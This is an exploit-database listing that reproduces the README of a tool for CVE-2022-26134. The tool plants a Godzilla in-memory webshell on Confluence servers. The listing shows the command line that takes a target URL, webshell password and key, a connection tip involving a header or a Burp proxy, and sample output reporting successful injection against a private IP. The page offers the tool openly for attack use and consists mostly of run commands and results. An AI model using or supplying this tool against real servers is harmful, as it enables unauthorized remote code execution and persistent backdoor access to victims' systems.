Sploitus

Exploit for CVE-2022-26134-Godzilla-MEMSHELL

kitploit · 2026-08-26

Exploit Code

MARKDOWN40 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-BEICHENDREAM-CVE-2022-26134-GODZILLA-MEMSHELL
# CVE-2022-26134-Godzilla-MEMSHELL

## Usage

root@kitploit:~
    
    
    java -jar CVE-2022-26134.jar 哥斯拉密码 哥斯拉密钥
    
    example
            java -jar CVE-2022-26134.jar pass key
    
    

Se o shell na memória já tiver sido injetado com sucesso, mas o Godzilla não conseguir se conectar, adicione o seguinte cabeçalho de protocolo na configuração da requisição ou configure o proxy Burp para o Godzilla.

root@kitploit:~
    
    
    Connection: close
    

![image](https://assets.kitploit.com/production/public/readmes/15586/330ac7d51c0ae47d9a28d3db94fb5c6a2936b8606aa603557f80b1e9c4ab1cf0.png)

root@kitploit:~
    
    
    C:\CVE_2022_26134_jar>java -jar CVE-2022-26134.jar http://10.10.10.10:8090/ pass key
    [*] url: http://10.10.10.10:8090/
    [*] send payload
    [*] exploit success
    [*] godzilla webshell password : pass
    [*] godzilla webshell key : key
    
    C:\CVE_2022_26134_jar>
    
    

![image](https://assets.kitploit.com/production/public/readmes/15586/e4500ab55f7b2345a334596501984f0f525781d6da04d9279b208d3d542a4cc6.png)